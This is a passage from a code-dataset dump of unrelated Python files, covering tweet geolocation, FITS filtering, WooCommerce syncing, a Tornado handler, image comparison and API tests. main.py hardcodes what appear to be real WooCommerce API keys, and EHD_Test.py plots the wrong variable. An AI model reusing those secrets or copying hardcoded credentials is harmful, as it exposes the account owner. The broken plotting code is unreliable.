\"models/base.py\"\n test_base = \"tests/test_models/test_base.py\"\n result = style.check_files([base, test_base])\n self.assertEqual(result.total_errors, 0)\n\n\nclass TestDocs(unittest.TestCase):\n \"\"\"test docstrings for base and test_base files\"\"\"\n\n def test_module(self):\n \"\"\"check module docstrings\"\"\"\n self.assertTrue(len(base.__doc__) > 0)\n\n def test_class(self):\n \"\"\"check class docstrings\"\"\"\n self.assertTrue(len(Base.__doc__) > 0)\n\n def test_method(self):\n \"\"\"check method docstrings\"\"\"\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"541174809","text":"import re\nimport operator \nimport json\nfrom collections import Counter\nfrom nltk.corpus import stopwords\nimport string\nimport vincent\nimport pandas\nimport tweepy\n \nwhile True: \n\tfname = 'pythonhate.json'\n\n\temoticons_str = r\"\"\"\n\t\t(?:\n\t\t\t[:=;] # Eyes\n\t\t\t[oO\\-]? # Nose (optional)\n\t\t\t[D\\)\\]\\(\\]/\\\\OpP] # Mouth\n\t\t)\"\"\"\n \n\tregex_str = [\n\t\temoticons_str,\n\t\tr'<[^>]+>', # HTML tags\n\t\tr'(?:@[\\w_]+)', # @-mentions\n\t\tr\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n\t\tr'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n \n\t\tr'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n\t\tr\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n\t\tr'(?:[\\w_]+)', # other words\n\t\tr'(?:\\S)' # anything else\n\t]\n \n\ttokens_re = re.compile(r'('+'|'.join(regex_str)+')', re.VERBOSE | re.IGNORECASE)\n\temoticon_re = re.compile(r'^'+emoticons_str+'$', re.VERBOSE | re.IGNORECASE)\n \n\tdef tokenize(s):\n\t\treturn tokens_re.findall(s)\n \n\tdef preprocess(s, lowercase=False):\n\t\ttokens = tokenize(s)\n\t\tif lowercase:\n\t\t\ttokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n\t\treturn tokens\n\n\tpunctuation = list(string.punctuation)\n\tstop = stopwords.words('english') + punctuation + ['rt','via','RT']\n\n\tdates_ITAvWAL = []\n\n\twith open(fname, 'r') as f:\n\t\tcount_all=Counter()\n\t\tgeo_data ={\n\t\t\t\t\"type\":\"FeatureCollection\",\n\t\t\t\t\"features\":[]\n\t\t\t}\n\t\tfor line in f:\n\t\t\ttry:\n\t\t\t\ttweet = json.loads(line)\n\t\t\t\t# Create a list with all the terms\n\t\t\t\t#terms_only = [term for term in preprocess(tweet['text']) \n\t\t\t\t#if term not in stop and\n\t\t\t\t#not term.startswith(('#', '@'))]\n\t\t\t\tif tweet['coordinates']:\n\t\t\t\t\t#print(\"we are in new loop\")\n\t\t\t\t\tgeo_json_feature={\n\t\t\t\t\t\t\"type\": \"Feature\",\n\t\t\t\t\t\t\"geometry\":tweet['coordinates'],\n\t\t\t\t\t\t\"properties\":{\n\t\t\t\t\t\t\t\"text\": tweet['text'],\n\t\t\t\t\t\t\t\"created_at\": tweet[\"created_at\"]\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t#print(\"finished loop\")\n\t\t\t\t\tgeo_data['features'].append(geo_json_feature)\n\t\t\t\t#terms_only = [term for term in preprocess(tweet['text']) if term.startswith('#')]\n\t\t\t\t#if '#' in terms_only:\n\t\t\t\t\t#print(\"in loop\")\n\t\t\t\t\t#dates_ITAvWAL.append(tweet[\"created_at\"])\n\t\t\t\t\t#print(\"finished loop\")\n\t\t\t\t# Update the counter\n\t\t\t\t#count_all.update(terms_only)\n\t\t\t\t#word_freq = count_all.most_common(20)\n\t\t\t\t#labels, freq = zip(*word_freq)\n\t\t\t\t#data = {'data': freq, 'x': labels}\n\t\t\t\t#bar = vincent.Bar(data, iter_idx='x')\n\t\t\t\t#bar.to_json('term_freq.json')\n\t\t\t\t# a list of \"1\" to count the hashtags\n\t\t\t\t#ones = [1]*len(dates_ITAvWAL)\n\t\t\t\t# the index of the series\n\t\t\t\t#idx = pandas.DatetimeIndex(dates_ITAvWAL)\n\t\t\t\t# the actual series (at series of 1s for the moment)\n\t\t\t\t#ITAvWAL = pandas.Series(ones, index=idx)\n\t\t\t\t#per_minute = ITAvWAL.resample('1Min', how='sum').fillna(0)\n\t\t\t\t#time_chart = vincent.Line(per_minute)\n\t\t\t\t#time_chart.axis_titles(x='Time', y='Freq')\n\t\t\t\t#time_chart.to_json('time_chart.json')\n\t\t\t\t\n\t\t\texcept: pass\n\t\t# Print the first 5 most frequent words\n\t\t#print(count_all.most_common(5))\n\t\t#print(dates_ITAvWAL)\n\t\t#print(ones)\n\t\t#print(idx)\n\t\t#print(ITAvWAL)\n\t\t#print(per_minute)\n\twith open('geo_datahate.json', 'w') as fout:\n\t\tfout.write(json.dumps(geo_data, indent=4))\n\tprint(\"the end\")","sub_path":"filterandgetlocationhate.py","file_name":"filterandgetlocationhate.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"181258083","text":"from astropy.io import fits as pyfits\nimport numpy as np\nfrom galaxyzoo2 import fits_path\n\ngz2_full_data_file = fits_path+'gz2_original_extra_s82norm_table_sample.fits'\np = pyfits.open(gz2_full_data_file)\ngzdata = p[1].data\np.close()\n\npdisk = gzdata['t01_smooth_or_features_a02_features_or_disk_weighted_fraction']\npnotedge = gzdata['t02_edgeon_a05_no_weighted_fraction']\nnbar = gzdata['t03_bar_a06_bar_weight']\npbar = gzdata['t03_bar_a06_bar_weighted_fraction']\nredshift = gzdata['REDSHIFT']\n\nklm = ((pdisk*pnotedge) >= 0.25) & (nbar >= 10) & (pbar >= 0.5) & (redshift <= 0.01)\n\n\ncol1 = pyfits.Column(name = 'objid', format='A18', array=gzdata['objid_1'][klm])\ncol2 = pyfits.Column(name = 'p_bar', format='E', array=pbar[klm])\ncol3 = pyfits.Column(name = 'petror50_r', format='E', array=gzdata['PETROR50_R'][klm])\ncol4 = pyfits.Column(name = 'petror90_r', format='E', array=gzdata['PETROR90_R'][klm])\ncol5 = pyfits.Column(name = 'p_disk', format='E', array=pdisk[klm])\ncol6 = pyfits.Column(name = 'p_notedge', format='E', array=pnotedge[klm])\ncol7 = pyfits.Column(name = 'n_bar', format='E', array=nbar[klm])\ncol8 = pyfits.Column(name = 'redshift', format='E', array=redshift[klm])\n\nprimary_hdu = pyfits.PrimaryHDU(np.array((10,10)))\nhdulist = pyfits.HDUList([primary_hdu])\n\ntb1_hdu = pyfits.new_table(pyfits.ColDefs([col1,col2,col3,col4,col5,col6,col7,col8]))\ntb1_hdu.name = 'GZDATA'\n\nhdulist.append(tb1_hdu)\n\nhdulist.writeto(fits_path+'klm_evla_bars_gas.fits',clobber=True) \n\n\"\"\"\nRemaining steps to send data to Karen:\n\nIn TOPCAT, convert the `objid` column to a long integer by using parseLong($1)\nExport file from TOPCAT as VOTable\nUpload VOTable to CasJobs SDSS-II site\nCross-match data using SQL query:\n\n SELECT KLM.*, G.modelmag_r, log10(G.expAB_r) as log_expAB_r, G.ra, G.dec\n into mydb.klm_all \n from mydb.klm2 as KLM\n JOIN GALAXY as G on G.objid = KLM.objid\n\nDownload data as FITS or CSV file.\n\"\"\"\n","sub_path":"python/klm_evla_bars_gas.py","file_name":"klm_evla_bars_gas.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"174782316","text":"import os\nimport pprint\nfrom configparser import ConfigParser\nimport pyodbc as pyodbc\nimport schedule\nimport time\nfrom woocommerce import API\nimport json\nfrom pantheonArtikli import pantheon_artikli, id_pantheon_artikala\nfrom woocommerceArtikli import wc_artikli_za_poredjenje, id_woocommerce_artikala\nfrom poredjenjeArtikala import razlika\n\nstart_time = time.time()\n\nwcapi = API(\n url=\"https://shop.aporia.app\",\n consumer_key=\"ck_b60aa7be8132d949e8c32dc0f9a80187b4a5f155\",\n consumer_secret=\"cs_d0a6868e24896fdc20ab4dad590f20d0bb26b51e\",\n version=\"wc/v3\",\n wp_api=True,\n query_string_auth=True,\n timeout=30\n)\n\n# ################################################################################################################\n# artikli koji imaju u pantheonu a nemaju na shopu, znaci treba ih dodati\n# ################################################################################################################\n\nid_za_insert = list(set(id_pantheon_artikala) - set(id_woocommerce_artikala))\nprint(id_za_insert)\nprint('Broj artikala za insert:', len(id_za_insert))\n\nartikli_za_insert = []\nfor ident in id_za_insert:\n for artikal in pantheon_artikli:\n if artikal['sku'] == ident:\n artikli_za_insert.append(artikal)\n\n# print('Artikli koji su za insert su:', artikli_za_insert)\n\n#################################################################################################################\n# Update artikala na Woocommerce #\n#################################################################################################################\ndef updateWcArtikli():\n brojac = 1\n for i in razlika:\n if 'id' in i:\n id = i['id']\n sifra_artikla = i['sku']\n wcapi.put(f\"products/{id}\", i).json()\n print(f'Update artikal br. {brojac}, id: {id}, sifra: {sifra_artikla}')\n brojac += 1\n\n print('Update-ovano je:', brojac-1,'artikala')\n\n#################################################################################################################\n# Dodavanje artikala na Woocommerce #\n#################################################################################################################\n\ndef postToWc():\n for artikal in artikli_za_insert:\n wcapi.post(\"products\", artikal).json()\n print('Insertovan je:', artikal['name'], ', sifra:', artikal['sku'])\n \npostToWc()\nupdateWcArtikli()\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214255686","text":"# -*- coding: utf-8 -*-\nfrom tornado.concurrent import run_on_executor\nfrom tornado.gen import coroutine\n\nfrom apps.common.handlers.base import BaseHandler\nfrom apps.crond.model import CrondQueues\n\n\nclass QueueHandler(BaseHandler):\n # 查询所有队列\n @coroutine\n def get(self, *arg):\n if arg:\n self.set_status(404)\n self.write(\"404: Not Found.\")\n else:\n yield self.get_queues()\n\n @run_on_executor\n def get_queues(self):\n try:\n rows = self.db.query(\n CrondQueues.id, CrondQueues.queue, CrondQueues.exchange, CrondQueues.routing_key, CrondQueues.remark\n ).all()\n data = [dict(id=row[0], queue=row[1], exchange=row[2], routing_key=row[3], remark=row[4]) for row in rows]\n self.write_data(data)\n except:\n self.write_message(3, \"查询数据库错误\")\n raise Exception(\"查询数据库错误\")\n\n finally:\n self.db.close()\n\n # 增加队列\n @coroutine\n def post(self):\n if self.check_args_length <= 4:\n queue = self.get_json_arg(\"queue\")\n exchange = self.get_json_arg(\"exchange\")\n routing_key = self.get_json_arg(\"routing_key\")\n remark = self.get_json_arg(\"remark\")\n yield self.add_queue(queue, exchange, routing_key, remark)\n else:\n self.write_message(3, \"POST参数错误\")\n\n @run_on_executor\n def add_queue(self, queue, exchange, routing_key, remark):\n try:\n exist_key = self.db.query(CrondQueues.routing_key).filter(\n CrondQueues.exchange == exchange, CrondQueues.routing_key == routing_key).limit(1).all()\n exist_queue = self.db.query(CrondQueues.queue).filter(\n CrondQueues.exchange == exchange, CrondQueues.queue == queue).limit(1).all()\n if exist_key:\n self.write_message(1, \"路由键\" + routing_key + \"已绑定交换机\" + exchange)\n elif exist_queue:\n self.write_message(1, \"队列\" + queue + \"已绑定交换机\" + exchange)\n else:\n new_queue = CrondQueues(queue=queue, exchange=exchange, routing_key=routing_key, remark=remark)\n self.db.add(new_queue)\n self.db.commit()\n self.write_message(1, \"队列添加成功\")\n except Exception:\n self.db.rollback()\n self.write_message(3, \"查询数据库错误\")\n raise Exception(\"查询数据库错误\")\n finally:\n self.db.close()\n\n # 删除队列\n @coroutine\n def delete(self, id):\n yield self.del_queue(id)\n\n @run_on_executor\n def del_queue(self, id):\n try:\n self.db.query(CrondQueues).filter(CrondQueues.id == id).delete(synchronize_session=False)\n self.db.commit()\n self.write_message(1, \"队列已删除\")\n except:\n self.db.rollback()\n self.write_message(3, \"查询数据库错误\")\n raise Exception(\"查询数据库错误\")\n finally:\n self.db.close()\n","sub_path":"apps/crond/handlers/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"645179118","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n#read the sequence\nseq='ATGCGACTACGATCGAGGGCCAT'\nseq=','.join(seq) \ncdna=''\n#turn the sequence into a list\nlist=seq.split(',')\n#get the complementary sequence\nfor i in list:\n if i=='A':\n cdna=\"T\"+cdna\n elif i=='C':\n cdna=\"G\"+cdna\n elif i=='G':\n cdna=\"C\"+cdna\n elif i=='T':\n cdna=\"A\"+cdna\n# output \nprint(cdna)\n\n","sub_path":"Practical8/RC.py","file_name":"RC.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"525467926","text":"# Program to compare two images on the basis of Edge Histogram Descriptor (EHD)\nimport tkinter as tk\nfrom tkinter import filedialog\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyehd as ehd\nfrom PIL import Image\n\n# Get file name for img1\nroot = tk.Tk()\nroot.withdraw()\nfile_path1 = filedialog.askopenfilename()\nfile_name1 = os.path.basename(file_path1)\n# Reading Image 1\nimg1 = plt.imread(file_path1)\n# Get file name for img2\nroot = tk.Tk()\nroot.withdraw()\nfile_path2 = filedialog.askopenfilename()\nfile_name2 = os.path.basename(file_path2)\nimg2 = plt.imread(file_path2)\n# Function findehd() to get EHD vector\n\n# Finding EHD1\nehd1 = ehd.findehd(img1)\n# Finding EHD2\nehd2 = ehd.findehd(img2)\n\nfig, axs = plt.subplots(nrows=2, ncols=2)\naxs[0,0].imshow(img1)\nplt.title('Image 1')\naxs[0,1].bar([1,2,3,4,5], axs[80:85])\naxs.set_title('Global Bin of Image 1')\naxs[1,0].imshow(img2)\nplt.title('Image 2')\naxs[1,1].bar([1,2,3,4,5], axs[80:85])\naxs.set_title('Global Bin of Image 2')\n\nplt.figure(2)\nehd_plot1, = plt.plot(ehd1,color='r')\nehd_plot2, = plt.plot(ehd2,color='b')\nplt.title('Comparing EHD1 and EHD2')\nplt.legend([ehd_plot1, ehd_plot2],[\"EHD1\", \"EHD2\"])\n\n# L2 Distance between EHD1 and EHD2\nD2 = np.sqrt(np.sum((ehd1-ehd2)**2))\nnp.disp('L2 Distance = %1.2f' % D2)\n# L1 Distance between EHD1 and EHD2\nD1 = np.sum(np.abs(ehd1-ehd2))\nnp.disp('L1 Distance = %1.2f' % D1)","sub_path":"EHD_Test.py","file_name":"EHD_Test.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"422411862","text":"# from urllib.request import urlopen\n# from bs4 import BeautifulSoup\n\n# html = urlopen(\"http://www.pythonscraping.com/pages/warandpeace.html\", )\n# bsObj = BeautifulSoup(html, features=\"html5lib\")\n# nameList = bsObj.findAll(\"span\", {\"class\": \"green\"})\n# text1 = bsObj.findAll(id = \"text\")\n# # for name in nameList:\n# # print(name.get_text())\n\n# print(text1)\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.error import HTTPError\n# from urllib.error import URLError\n\n# try:\n# html = urlopen('http://www.pythonscraping.com/pages/page1.html')\n# # bs = BeautifulSoup(html, 'html.parser')\n# # bs = BeautifulSoup(html, 'lxml')\n# except HTTPError as e:\n# print(e)\n# except URLError as e:\n# print('the server could not be found')\n# else:\n# print('it worked')\n# bs = BeautifulSoup(html, 'html5lib')\n# print(bs.h1)\n\n\ndef getTitle(url):\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n try:\n bs = BeautifulSoup(html.read(), 'html.parser')\n title = bs.body.h1\n except AttributeError as e:\n return None\n return title\n\n\ntitle = getTitle('http://www.pythonscraping.com/pages/page1.html')\nif title == None:\n print('Title could not fount')\nelse:\n print(title)\n","sub_path":"Python基础/Python网络数据采集/bs4demo2-1.py","file_name":"bs4demo2-1.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"599145320","text":"import argparse\nimport imdb\nimport codecs\n\ndef get_songs( id ):\n \"\"\" get all songs for tv show from IMDB\n \n retrieve all songs for a tv show from IMDB. Uses the subsection \n 'soundtrack' in section 'Did You Know?' to get the title and artist of\n the song.\n \n Args:\n id: IMDB-ID of the tv show without 'tt', e.g. '0702964'\n Returns:\n * list of songs, where entries are dictionaries with following keys:\n season, episode, artist, title\n * title of the show \n \"\"\"\n \n # get all episodes\n ia = imdb.IMDb()\n show = ia.get_movie(id)\n \n ia.update(show, 'episodes')\n episodes = show['episodes']\n\n all_songs = []\n\n for s in episodes: \n print(\"\\nSeason %d\" % s)\n for e in episodes[s]: \n print(\" Episode %d\" % e) \n episode = episodes[s][e]\n # Get soundtrack for episode\n ia.update(episode,'soundtrack')\n try:\n soundtrack = episode['soundtrack']\n except:\n print(\" (no soundtrack)\")\n continue\n \n \"\"\" soundtrack is a list of tracks. Each track is a dictionary\n with one entry. The key contains the title and the value is \n a dictionary that contains more information like the artist \"\"\" \n \n for track in soundtrack: \n for title in track: \n # use the entire string as fallback for artist\n artist = \" \".join(track[title])\n for info in track[title]:\n # use either 'performed by', 'sung by' or\n # 'written and performed by' as artist\n if info.endswith(\"performed by\") or info == u'sung by':\n artist = track[title][info]\n \n entry = {'season': s,\n 'episode': e,\n 'artist': artist,\n 'title': title}\n \n print( \" %s - %s\" % (artist,title) )\n all_songs.append(entry) \n return all_songs, show['title']\n \ndef write_songs_to_file( path, all_songs ):\n try:\n w = codecs.open(path, \"w\", \"utf-8\")\n for song in all_songs:\n ep = 'S{0:0>2}E{1:0>2}'.format(song['season'],song['episode'])\n w.write(\"%s;%s - %s\\n\" % (ep, song['artist'], song['title'] ) )\n except Exception as e:\n print(\"Error: Couldn't write songs to file: %s\" % e)\n finally:\n w.close()\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description='Get soundtrack of TV Show')\n parser.add_argument('id',help='IMDB ID of TV Show (minus \"tt\")')\n args = parser.parse_args() \n (all_songs,title) = get_songs(args.id)\n write_songs_to_file( title + '.txt', all_songs)\n","sub_path":"source/files/tvtunes.py","file_name":"tvtunes.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"428864536","text":"#!/usr/bin/python3\nimport requests\n\n#data = {\"nome\" : \"Leonardo\"}\n#data = {\"nome\" : \"Maria Madalena\", \"email\" : \"mamada@ig.com\"}\n\nresponse = requests.get('http://127.0.0.1:5000/usuarios')\ndata = response.json()\n#tentar printar o ID e o nome dos usuarios\n\n#print ('{0:.>10}{1:.>30}'.format('ID','NOME'))#testar\nfor u in data ['usuarios']:\n if u ['id'] % 2==0:\n print(u['id'],u ['nome']) #busca os nomes e id's\n\n \n\n\n#response = requests.post('http://127.0.0.1:5000/usuarios', json=data)\n#response = requests.put('http://127.0.0.1:5000/usuarios/7', json=data)\n\n#response = requests.delete('http://127.0.0.1:5000/usuarios/7', json=data)\n\n#Tentar executar a rota \"delete\" de um usuário qualquer\n\n","sub_path":"requisicoes.py","file_name":"requisicoes.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52987498","text":"import datetime\nimport logging\nimport os\nfrom os import path\n\nfrom django import template\n\nfrom configs.settings import STATIC_URL, STATICFILES_DIRS\n\nregister = template.Library()\nlogger = logging.getLogger(__name__)\n\nstatic_url_cache = {}\n\n\n@register.filter\ndef replace_str(value):\n return value.replace(\"\\'\", \"\\\"\")\n\n\n@register.simple_tag\ndef static_url(file_name):\n # value = static_url_cache.get(file_name)\n # if value is None or DEBUG:\n value = calculate_url(file_name)\n return value\n\n\ndef calculate_url(file_name):\n entry_name = file_name\n try:\n key = '#root#'\n if key in file_name:\n file_name = file_name.split(key, 1)[1]\n file_path = path.join(STATICFILES_DIRS[0], entry_name.replace(key, ''))\n prefix = ''\n else:\n file_path = path.join(STATICFILES_DIRS[0], file_name)\n prefix = STATIC_URL\n\n file_modified = calculate_file_name(path.join(STATICFILES_DIRS[0], file_path))\n if file_modified != 'error':\n file_modified = file_modified[: 16]\n value = '%s%s?v=%s' % (prefix, file_name, file_modified)\n # logger.info(\"Caching url '%s' for file '%s'\", value, file_name)\n except Exception as e:\n if hasattr(e, 'errno') and e.errno == 21: # is a directory\n value = STATIC_URL + file_name\n logger.error(\"Caching url '%s' for directory %s\", value, file_name)\n else:\n raise Exception('Unable to calculate md5 for {} because {}', file_name, e)\n static_url_cache[entry_name] = value\n return value\n\n\ndef calculate_file_name(file_path):\n\n try:\n temp = str(datetime.datetime.fromtimestamp(os.path.getmtime(file_path)))\n except FileNotFoundError:\n temp = 'error'\n if temp != 'error':\n temp = temp.replace(' ', '_')\n return temp\n # with open(file_path, 'rb') as fh:\n # m = hashlib.md5()\n # while True:\n # data = fh.read(8192)\n # if not data:\n # break\n # m.update(data)\n # return m.hexdigest()\n","sub_path":"pters_project/login/templatetags/static_url.py","file_name":"static_url.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"257749548","text":"# coding:utf8\n__author__ = '613108'\n\n\ndef saveScreenShot(url='http://shop115634117.taobao.com', driver=None,title=''):\n from selenium import webdriver\n from selenium.webdriver.common.action_chains import ActionChains\n import time\n\n if not driver:\n # dri=webdriver.PhantomJS()\n dri = webdriver.Chrome()\n else:\n dri = driver\n dri.get(url)\n dri.maximize_window()\n # try:title = dri.title.split('-')[1]\n # except:title=dri.title\n tm = time.strftime(\"%Y-%m-%d+%H-%M-%S\", time.localtime())\n TITLE = title + '+' + tm + '+BASE'\n time.sleep(2)\n dri.save_screenshot('d:/spider/tmall/screenShot/%s.png' % TITLE)\n\n try:\n element = dri.find_element_by_xpath(\".//*[@class='main-info']/div[1]/div[2]/span\")\n ActionChains(dri).move_to_element(element).perform()\n time.sleep(2)\n\n TITLE = title + '+' + tm + '+DETAIL'\n dri.save_screenshot('d:/spider/tmall/screenShot/%s.png' % TITLE)\n except:pass\n # dri.quit()\n return dri\n","sub_path":"Tmall_project/newProject/screenShot/screenShot.py","file_name":"screenShot.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"159261570","text":"class StateMachine:\n def __init__(self): \n self.STATE = {\"q1\" : 1, \"q2\" : 2, \"q3\" : 3, \"q4\" : 4}\n self.MIN_INT, self.MAX_INT = -2**31, 2**31 - 1\n \n self.curr_state = 1\n self.val = 0\n self.sign = 1\n \n def to_q2(self, c: chr) -> None:\n self.sign = -1 if c == \"-\" else 1\n self.curr_state = self.STATE[\"q2\"]\n \n def to_q3(self, c:chr) -> None:\n self.curr_state = self.STATE[\"q3\"]\n if (\n self.val > self.MAX_INT // 10 \n or (self.val == self.MAX_INT // 10 and int(c) > self.MAX_INT % 10)\n ):\n if self.sign == 1:\n # If sign is 1, clamp result to INT_MAX.\n self.val = self.MAX_INT\n else:\n # If sign is -1, clamp result to INT_MIN.\n self.val = self.MIN_INT\n self.sign = 1\n self.to_q4()\n else:\n self.val = self.val*10 + int(c)\n \n def to_q4(self) -> None:\n self.curr_state = self.STATE[\"q4\"]\n \n def push_char(self, c: chr) -> None:\n if self.curr_state == self.STATE[\"q1\"]:\n if c == \" \":\n return\n elif c in (\"-\", \"+\"):\n self.to_q2(c)\n elif c.isdigit():\n self.to_q3(c)\n else:\n self.to_q4()\n elif self.curr_state in (self.STATE[\"q2\"], self.STATE[\"q3\"]):\n if c.isdigit():\n self.to_q3(c)\n else:\n self.to_q4()\n \n def get_state(self) -> int:\n return self.curr_state\n \n def get_val(self) -> int:\n return self.sign * self.val\n\nclass Solution:\n def myAtoi(self, s: str) -> int:\n sm = StateMachine()\n for c in s:\n sm.push_char(c)\n if sm.get_state() == sm.STATE[\"q4\"]:\n \n break\n return sm.get_val()","sub_path":"problems/string_to_integer_(atoi)/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"270758229","text":"# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom flask import json\nfrom mock import patch\n\nfrom collector.test.base import DbTest\n\nfrom collector.api.app import db\nfrom collector.api.common import consts\nfrom collector.api.db.model import ActionLog\nfrom six.moves import xrange\n\n\nclass TestActionLogs(DbTest):\n\n def test_not_allowed_methods(self):\n resp = self.get('/api/v1/action_logs/', None)\n self.check_response_error(resp, 405)\n resp = self.delete('/api/v1/action_logs/')\n self.check_response_error(resp, 405)\n resp = self.patch('/api/v1/action_logs/', None)\n self.check_response_error(resp, 405)\n resp = self.put('/api/v1/action_logs/', None)\n self.check_response_error(resp, 405)\n\n def test_empty_action_logs_post(self):\n resp = self.post('/api/v1/action_logs/', {'action_logs': []})\n self.check_response_ok(resp)\n\n def test_post(self):\n master_node_uid = 'x'\n expected_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"\",\n \"action_name\": \"\",\n \"action_type\": \"http_request\",\n \"start_timestamp\": \"\",\n \"end_timestamp\": \"\",\n \"additional_info\": {\n \"request_data\": {},\n \"response_data\": {}\n },\n \"is_sent\": False,\n \"cluster_id\": 5,\n \"task_uuid\": None\n }\n }\n for i in xrange(3)]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': expected_logs}\n )\n self.check_response_ok(resp)\n resp_data = json.loads(resp.data)\n for d in resp_data['action_logs']:\n self.assertEqual(\n consts.ACTION_LOG_STATUSES.added,\n d['status']\n )\n\n actual_logs = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid).all()\n self.assertEqual(len(expected_logs), len(actual_logs))\n self.assertListEqual(\n sorted([l['external_id'] for l in expected_logs]),\n sorted([l.external_id for l in actual_logs])\n )\n\n def test_post_duplication(self):\n master_node_uid = 'x'\n action_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"\",\n \"action_name\": \"\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"1\",\n \"end_timestamp\": \"2\",\n \"additional_info\": {\n \"parent_task_id\": 0,\n \"subtasks_ids\": [],\n \"operation\": \"\",\n \"nodes_from_resp\": [],\n \"ended_with_status\": \"\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5,\n \"task_uuid\": None\n }\n }\n for i in xrange(100)]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs}\n )\n self.check_response_ok(resp)\n count_actual = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid).count()\n resp_data = json.loads(resp.data)\n for d in resp_data['action_logs']:\n self.assertEqual(\n consts.ACTION_LOG_STATUSES.added,\n d['status']\n )\n self.assertEqual(len(action_logs), count_actual)\n\n # Checking duplications is not added\n new_action_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"\",\n \"action_name\": \"\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"3\",\n \"end_timestamp\": \"4\",\n \"additional_info\": {\n \"parent_task_id\": 0,\n \"subtasks_ids\": [],\n \"operation\": \"\",\n \"nodes_from_resp\": [],\n \"ended_with_status\": \"\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5,\n \"task_uuid\": None\n }\n }\n for i in xrange(len(action_logs) + 50)]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs + new_action_logs}\n )\n self.check_response_ok(resp)\n count_actual = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid).count()\n self.assertEqual(\n len(new_action_logs),\n count_actual\n )\n data = json.loads(resp.data)\n existed = filter(\n lambda x: x['status'] == consts.ACTION_LOG_STATUSES.existed,\n data['action_logs']\n )\n added = filter(\n lambda x: x['status'] == consts.ACTION_LOG_STATUSES.added,\n data['action_logs']\n )\n self.assertEqual(len(action_logs), len(existed))\n self.assertEqual(len(new_action_logs) - len(action_logs), len(added))\n\n def test_validation_error(self):\n expected_logs = [{'master_node_uid': 'x', 'external_id': None}]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': expected_logs}\n )\n self.check_response_error(resp, code=400)\n\n def test_incomplete_tasks(self):\n master_node_uid = 'x'\n action_logs = [\n {\n 'master_node_uid': master_node_uid,\n 'external_id': i,\n 'body': {\n \"id\": i,\n 